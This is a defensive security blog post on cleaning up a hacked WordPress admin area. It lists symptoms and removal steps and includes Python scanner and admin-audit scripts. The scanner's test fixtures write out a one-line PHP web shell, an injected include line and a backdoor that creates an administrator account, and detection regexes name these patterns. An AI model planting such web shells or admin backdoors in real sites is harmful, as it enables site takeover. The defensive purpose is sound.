How to fix WordPress admin dashboard (wp-admin) hack

One of the worst feelings you can experience as a website owner is finding out that your website has been hacked. If proactive security measures are not taken, an attacker who gains control of the WordPress admin panel can use it to launch pharma attacks, phishing pages, Japanese SEO spam, redirection malware and more.

A wp-admin hack currently in circulation adds an unauthorized WordPress administrator user and infects the site with a pharma hack. The typical consequences include complete website takeover, data theft, compromise of the database and SEO hijacking. The WordPress admin area is the most sensitive part of your website: whoever controls it controls the site, and being locked out of it means losing control of your own website.

What are the symptoms of the wp-admin hack?

Typical symptoms of WordPress admin panel hack are:

  1. Administrator users you did not create have appeared in WordPress.
  2. WordPress pharma-hacked pages are being indexed by Google.
  3. New pages with Japanese text have been added to your website (Japanese SEO spam pages).
  4. Suspicious-looking base64-encoded code appears in theme or core files.
  5. Core WordPress files have been modified.
  6. Unknown files such as admin.php or adminer.php are found in the /public_html folder, or unexpected files appear in the /public_html/wp-admin folder (note that wp-admin/admin.php itself is a legitimate core file; an admin.php in the site root is not).
  7. The hacked wp-admin loads a different UI.
  8. When you visit the wp-admin page, instead of the login page you see a black/grey screen with a list of files on the server.
  9. After logging in to the WordPress admin area, you see a grey screen with a list of files on the server.
  10. An HTTP 500 internal server error when visiting wp-admin, or after logging in.
  11. The ‘Anyone can register’ option has been enabled on the Settings » General page in the WordPress admin area.
  12. Hundreds of spam WordPress users have been created.
  13. You are unable to add or delete plugins.
  14. WordPress security plugins get disabled automatically.
  15. A blank page when you visit the admin area.
  16. The WordPress website becomes very slow.
  17. Your hosting provider suspends your account.
  18. A web shell has been uploaded.
  19. A file manager named ‘B Ge Team File Manager’ has been uploaded.
(Screenshot: the ‘B G Team’ file manager uploaded by the attacker)

How to remove the WP-ADMIN malware code from my website?

1. Check index.php and wp-admin/index.php for modifications. Usually a single @require or @include line is added to the top of index.php, right after the opening PHP tag (the screenshot below shows one):

(Screenshot: malicious include line at the top of index.php)

The file being required/included here contains malicious code that runs on every request WordPress serves. Such code can generate fake pharma pages, Japanese SEO spam pages and other malware infections.


Delete the @require line after comparing the file with a pristine copy of the same WordPress version (from the wordpress.org download or the WordPress/WordPress GitHub mirror). The path in that line tells you where the payload lives: save a copy of that file for the investigation, then delete it as well, since it is what actually generates the spam pages.

A screenshot of the malicious file can be seen below:

(Screenshot: contents of the included malicious file)

2. Check for files in the root of the server or the /wp-admin folder that you did not create. Names seen in this campaign include:

  1. Marvins.php
  2. db_.php
  3. 8c18ee
  4. 83965
  5. admin.php
  6. buddy.zip
  7. dm.php

If you find any of the above suspicious files, take a backup and delete them. (wp-admin/admin.php is a legitimate core file; an admin.php in the site root is not.) A standard WordPress installation has the following in the root of the server, and nothing else apart from wp-config.php and any .htaccess or robots.txt you added yourself:

index.php, license.txt, readme.html, wp-activate.php, wp-admin/, wp-blog-header.php, wp-comments-post.php, wp-config-sample.php, wp-content/, wp-cron.php, wp-includes/, wp-links-opml.php, wp-load.php, wp-login.php, wp-mail.php, wp-settings.php, wp-signup.php, wp-trackback.php, xmlrpc.php

3. Perform a Google search to see the list of pages indexed for your domain:

site:example.com   (replace example.com with your own domain; there is no space after the colon)

(Screenshot: Japanese SEO spam pages in Google search results)

If the search results for your website are similar to the screenshot above, please refer to the Japanese SEO spam removal guide.

4. Delete unknown WordPress administrator accounts from the users page

Visit the users page (wp-admin/users.php?role=administrator) to see whether any new administrator accounts have been added, and immediately delete the ones you do not recognize. Cross-check against the wp_users and wp_usermeta tables in phpMyAdmin (look for wp_capabilities values containing administrator), because some backdoors hook the user query so that their own account never appears in the dashboard list.

5. Run a malware scan on all files on your server

In your web-hosting dashboard or cPanel, you should have an option called ‘Virus Scanner’. Run it to identify any malicious files which may be residing on the server. Verify and delete any files that it flags.

If you are an Astra customer, log in to your dashboard and initiate a malware scan from the top menu.

6. Delete PHP files found in the ‘uploads’ directory.

Due to vulnerabilities in WordPress plugins, or occasionally in the core itself, an attacker may be able to upload malicious PHP files to the web server. The uploads directory should contain only media, so any file with an executable extension such as .php, .php3, .php4, .php5, .phtml, .phar, .py, .asp or .aspx anywhere under /wp-content/uploads is an intruder: copy it somewhere safe for the investigation, then delete it.

You can also prevent PHP execution in this directory by placing an .htaccess file at the root of /uploads (this requires Apache with AllowOverride enabled; nginx ignores .htaccess and needs an equivalent deny rule in its server block):

# Kill PHP Execution
<FilesMatch "\.(?:ph(?:p[3-8]?|t|tml|ar))$">
   # Apache 2.4
   Require all denied
   # Apache 2.2 (or 2.4 with mod_access_compat) uses this instead:
   # deny from all
</FilesMatch>

7. Find backdoor script which adds an admin user to your WordPress website

Once the backdoor is executed it inserts a new WordPress user with the Administrator role, which the attacker can use to regain access to the installation at any time, even after the original entry point has been patched. Search every PHP file on the server (including wp-content/mu-plugins and the active theme's functions.php, which load on every request) for code that calls wp_create_user, wp_insert_user or set_role with the administrator role, and remove the backdoor before you delete the account; otherwise the account simply gets recreated.

(Screenshot: backdoor script that inserts an administrator user)
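The seven removal steps above are manual checks. The script below is an added example written for this article (it is not Astra's code nor part of WordPress) that automates them over a document root: it compares core files against a checksum map, flags a quoted @require/@include pointing at a hidden or non-PHP file, lists files in the core directories that WordPress never ships, finds executable files under wp-content/uploads, and greps for obfuscated eval, web-shell and administrator-granting patterns. The checksum map format (relative path to md5) is the one api.wordpress.org serves per version; the tree it scans here is constructed in a temp directory, and the file names in it (db_.php, dm.php, the .cache path) are made up to mirror the ones listed above.

```python
"""
Triage scanner for a WordPress document root. Added example for this article,
not Astra's or WordPress's code. It automates the removal steps above: core
files whose md5 differs from a known-good map, a quoted require/include injected
into index.php, files in the core directories that WordPress never ships,
executable files under wp-content/uploads, obfuscated eval / web-shell patterns
and PHP that grants the administrator role (the step 7 backdoor). For a live site
load core_checksums from api.wordpress.org/core/checksums/1.0/?version=<ver>
(relative path -> md5); the demo runs on a constructed tree instead.
"""
import hashlib
import re
import tempfile
from pathlib import Path

EXEC_EXT = {".php", ".php3", ".php4", ".php5", ".php7", ".php8", ".phtml",
            ".phar", ".py", ".asp", ".aspx"}
ALLOWED_EXTRA = {"wp-config.php", ".htaccess", ".user.ini", "robots.txt"}  # non-core but normal
# require/include with a quoted literal target. Core builds these paths from
# __DIR__/ABSPATH, so a bare quoted path in a core file is itself unusual.
INCLUDE_RE = re.compile(r"@?\b(?:require|include)(?:_once)?\s*\(?\s*['\"]([^'\"]+)['\"]", re.I)
ESCAPED_RE = re.compile(r"\\(?:x[0-9a-fA-F]{2}|[0-7]{3})")  # "\x2fhome\x2f..." style paths
SUSPECT_RE = {
    "obfuscated_eval": re.compile(r"\b(?:eval|assert|create_function)\s*\(\s*@?"
                                  r"(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "webshell_exec": re.compile(r"\b(?:system|shell_exec|passthru|exec|popen|proc_open)\s*\(\s*"
                                r"\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
    "admin_role_grant": re.compile(r"set_role\s*\(\s*['\"]administrator['\"]|"
                                   r"['\"](?:wp_)?capabilities['\"].{0,80}administrator", re.I | re.S),
}

def suspicious_include_target(target: str) -> bool:
    """Targets core never includes: escape-obfuscated strings, hidden path
    components, or non-PHP extensions (payloads are hidden in .ico/.txt/.jpg)."""
    if ESCAPED_RE.search(target):
        return True
    parts = target.replace("\\", "/").split("/")
    if any(p.startswith(".") and p not in (".", "..") for p in parts):
        return True
    return Path(target).suffix.lower() not in ("", ".php", ".inc", ".phtml")

def scan_install(root: Path, core_checksums: dict) -> list:
    """Walk the tree; return sorted (kind, relative_path, detail) findings."""
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        in_core_dir = "/" not in rel or rel.split("/")[0] in ("wp-admin", "wp-includes")
        if rel in core_checksums:
            digest = hashlib.md5(path.read_bytes()).hexdigest()
            if digest != core_checksums[rel]:
                findings.append(("core_modified", rel, digest))
        elif in_core_dir and rel not in ALLOWED_EXTRA:
            findings.append(("unknown_file", rel, ""))      # step 2: not shipped by WordPress
        ext = path.suffix.lower()
        if rel.startswith("wp-content/uploads/") and ext in EXEC_EXT:
            findings.append(("exec_in_uploads", rel, ext))  # step 6
        if ext not in EXEC_EXT:
            continue
        text = path.read_text(errors="replace")
        for m in INCLUDE_RE.finditer(text):                 # step 1
            if suspicious_include_target(m.group(1)):
                findings.append(("injected_include", rel, m.group(1)))
        for kind, rx in SUSPECT_RE.items():                 # steps 6 and 7
            hit = rx.search(text)
            if hit:
                findings.append((kind, rel, hit.group(0)[:60]))
    return sorted(findings)

# Constructed stand-ins for two core files, and their "known-good" md5s.
PRISTINE = {
    "index.php": "<?php\ndefine( 'WP_USE_THEMES', true );\nrequire __DIR__ . '/wp-blog-header.php';\n",
    "wp-admin/index.php": "<?php\nrequire_once __DIR__ . '/admin.php';\n",
}
SAMPLE_CHECKSUMS = {p: hashlib.md5(c.encode()).hexdigest() for p, c in PRISTINE.items()}

def build_sample_install(root: Path, infected: bool = True) -> Path:
    """Write the constructed tree; infected=True adds the artefacts described above."""
    files = dict(PRISTINE)
    if infected:
        # step 1: @include of a hidden, non-PHP file prepended to index.php
        files["index.php"] = ('<?php\n@include "/home/site/.cache/favicon.ico";\n'
                              + PRISTINE["index.php"][len("<?php\n"):])
        # step 6: web shell dropped into uploads
        files["wp-content/uploads/2019/05/dm.php"] = '<?php eval(base64_decode($_POST["c"]));\n'
        # steps 2 and 7: unknown root file that creates an administrator
        files["db_.php"] = ("<?php require 'wp-load.php';\n"
                            "$id = wp_create_user('wp_support', 'Pa55', 'x@mailbox.ru');\n"
                            "(new WP_User($id))->set_role('administrator');\n")
    for rel, content in files.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(content)
    return root

def demo_findings(infected: bool = True) -> list:
    """Build the constructed tree in a fresh temp dir and scan it."""
    root = build_sample_install(Path(tempfile.mkdtemp()), infected)
    return scan_install(root, SAMPLE_CHECKSUMS)

if __name__ == "__main__":
    for kind, rel, detail in demo_findings():
        print(f"{kind:18} {rel:36} {detail}")
```

On a live site, run it against a copy of the document root rather than the server itself, and treat every hit as something to read by hand: the patterns are deliberately broad, and legitimate role-management plugins will trip admin_role_grant. WP-CLI's wp core verify-checksums does the core-file comparison on its own, but it does not look at uploads, unknown root files or role-granting code, which is why this script covers those too.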

Steps to prevent re-infection & identify the cause

1. Install a web application firewall that detects and blocks attacks before they reach WordPress

WordPress core is developed with security in mind, but its plugins and themes are exposed to all kinds of attacks, so it is important to proactively protect a WordPress website against the steady stream of new threats. A security suite such as Astra puts a firewall in front of the site to block such targeted attacks.


2. Regularly update the WordPress core, plugins and themes

The threat landscape changes every day, so update WordPress core, plugins and themes as soon as patches are released. Attackers build tools that scan for and exploit known vulnerabilities in plugins; running an outdated plugin is the easiest way to get hacked.

3. Monitor administrator accounts being created in WordPress

In a typical site compromise, the attacker creates an administrator account for themselves so they can get back into the WordPress backend later. Review the administrator list regularly, and follow the principle of least privilege: give each user the lowest role that does the job.
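One way to make that review a routine check rather than a manual one, as an added example for this article and not Astra's code: export the user list and the two registration settings with WP-CLI, export the administrator rows straight from the database, and audit all three. The allowlist, review date and organisation domain below are assumed values, and the WP-CLI output and query results are constructed samples (the wp_ table prefix in the query is the default and must match the site's).

```python
"""
Administrator-account audit for the monitoring step above. Added example for
this article, not Astra's code. It consumes data exported with WP-CLI (the
command for each constructed sample is shown beside it) and flags the symptoms
this page lists: administrators who are not on your allowlist or were created
after the last review, administrators with an outside e-mail address, open
registration with an elevated default role, and accounts that carry the
administrator capability in the database but are missing from WordPress's own
user list, which is how a backdoor hides the account it created.
"""
import json
from datetime import datetime

# Site-specific baseline; the values are assumed for the demo.
ALLOWED_ADMINS = {"alice", "bob"}
REVIEWED_ON = datetime(2019, 3, 1)      # when the admin list was last verified
ORG_DOMAINS = {"example.com"}

# Constructed output of:
#   wp user list --format=json --fields=ID,user_login,user_email,user_registered,roles
# (roles is a comma-joined string, e.g. "editor,shop_manager").
SAMPLE_USER_LIST = json.dumps([
    {"ID": 1, "user_login": "alice", "user_email": "alice@example.com",
     "user_registered": "2017-06-12 09:14:00", "roles": "administrator"},
    {"ID": 2, "user_login": "bob", "user_email": "bob@example.com",
     "user_registered": "2018-01-20 11:02:33", "roles": "administrator"},
    {"ID": 7, "user_login": "wp_support", "user_email": "support@mailbox.ru",
     "user_registered": "2019-05-02 03:41:17", "roles": "administrator"},
    {"ID": 8, "user_login": "spam-user-0441", "user_email": "x@mail.example.net",
     "user_registered": "2019-05-02 03:55:09", "roles": "subscriber"},
])
# Constructed output of:  wp option get users_can_register  /  wp option get default_role
SAMPLE_OPTIONS = {"users_can_register": "1", "default_role": "administrator"}
# Constructed output of a direct query, which bypasses any WordPress hook
# (adjust the wp_ prefix to the site's $table_prefix):
#   wp db query "SELECT u.user_login FROM wp_users u JOIN wp_usermeta m ON m.user_id = u.ID
#                WHERE m.meta_key = 'wp_capabilities' AND m.meta_value LIKE '%administrator%'"
SAMPLE_DB_ADMINS = ["alice", "bob", "wp_support", "admin_helper"]

def audit_admins(user_list_json: str, options: dict, db_admin_logins: list) -> list:
    """Return (kind, detail) findings; an empty list means nothing to act on."""
    findings = []
    listed_admins = set()
    for u in json.loads(user_list_json):
        if "administrator" not in u["roles"].split(","):
            continue
        login = u["user_login"]
        listed_admins.add(login)
        registered = datetime.strptime(u["user_registered"], "%Y-%m-%d %H:%M:%S")
        if login not in ALLOWED_ADMINS:
            findings.append(("unknown_admin", login))
        elif registered > REVIEWED_ON:
            # an expected login that was (re)created after the last review
            findings.append(("admin_created_after_review", login))
        domain = u["user_email"].rsplit("@", 1)[-1].lower()
        if domain not in ORG_DOMAINS:
            findings.append(("admin_external_email", f"{login} <{u['user_email']}>"))
    # Capability rows in the DB without a matching entry in the user list:
    # a pre_user_query-style filter is hiding a backdoor account.
    for login in sorted(set(db_admin_logins) - listed_admins):
        findings.append(("hidden_admin", login))
    if options.get("users_can_register") == "1":
        findings.append(("open_registration", "Settings > General > Anyone can register"))
    if options.get("default_role", "subscriber") != "subscriber":
        findings.append(("elevated_default_role", options["default_role"]))
    return findings

if __name__ == "__main__":
    for kind, detail in audit_admins(SAMPLE_USER_LIST, SAMPLE_OPTIONS, SAMPLE_DB_ADMINS):
        print(f"{kind:26} {detail}")
```

Run the three exports from cron and mail yourself any non-empty result. Adding --skip-plugins --skip-themes to wp user list takes regular plugins and the theme out of the picture, but must-use plugins still load, so the direct database query is the authoritative list of who really holds the administrator capability.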

4. Take regular backups of WordPress files & Database

Configure automatic backups that archive all the files on the server as well as the database. Store them on an external server, so that they can still be retrieved after a hack, and keep several generations: if a compromise is only noticed weeks later, the most recent backup is already infected and you need an older, clean copy to compare against or restore from. Test a restore at least once so you know the archives are usable.

5. Update file & folder permissions on the server

The default permission scheme should be:

  • Folders – 755
  • Files – 644

wp-config.php holds the database credentials, so tighten it further (600, or 640 if the web server runs as a different user in your group), and never leave anything at 777.

You can change the file permissions recursively via command line:

For Directories:

find /path/to/your/wordpress/install/ -type d -exec chmod 755 {} \;

For Files:

find /path/to/your/wordpress/install/ -type f -exec chmod 644 {} \;

6. Disable File Editing
It is recommended to disable file editing within the WordPress dashboard, so that an attacker who obtains an administrator session cannot use the theme or plugin editor to write PHP to the server. Add the following two lines to wp-config.php above the ‘That’s all, stop editing!’ line (not after the require of wp-settings.php at the very end):

## Disable Editing in Dashboard
define('DISALLOW_FILE_EDIT', true);

If you also want to block plugin and theme installation and updates from the dashboard, define DISALLOW_FILE_MODS as true instead; it covers everything DISALLOW_FILE_EDIT does, but all updates must then be applied by other means, such as WP-CLI.


About Astra Security Suite

Astra is the essential web security suite that fights hackers, internet threats & bots for you. We provide proactive security for your websites running popular CMSs like WordPress, OpenCart, Magento etc. Our professional malware removal team is available 24×7 throughout the year to help you regain your hacked website and quickly get back to business. We’d love to help!


About The Author

Ananda Krishna

Ananda is a security researcher at Astra.

3 Comments

  1. Jose.mcdonald@turbineblades.co.uk

    Great article!

  2. I’m impressed, I have to say. Really not often do I encounter a blog that’s both educative and entertaining, and let me tell you, you’ve hit the nail on the head. Your concept is outstanding; the problem is something that not enough people are speaking intelligently about.

  3. Thank you for your great article. My site got hacked like what you described in this article. In my case, I found them in the wp-config.php file.
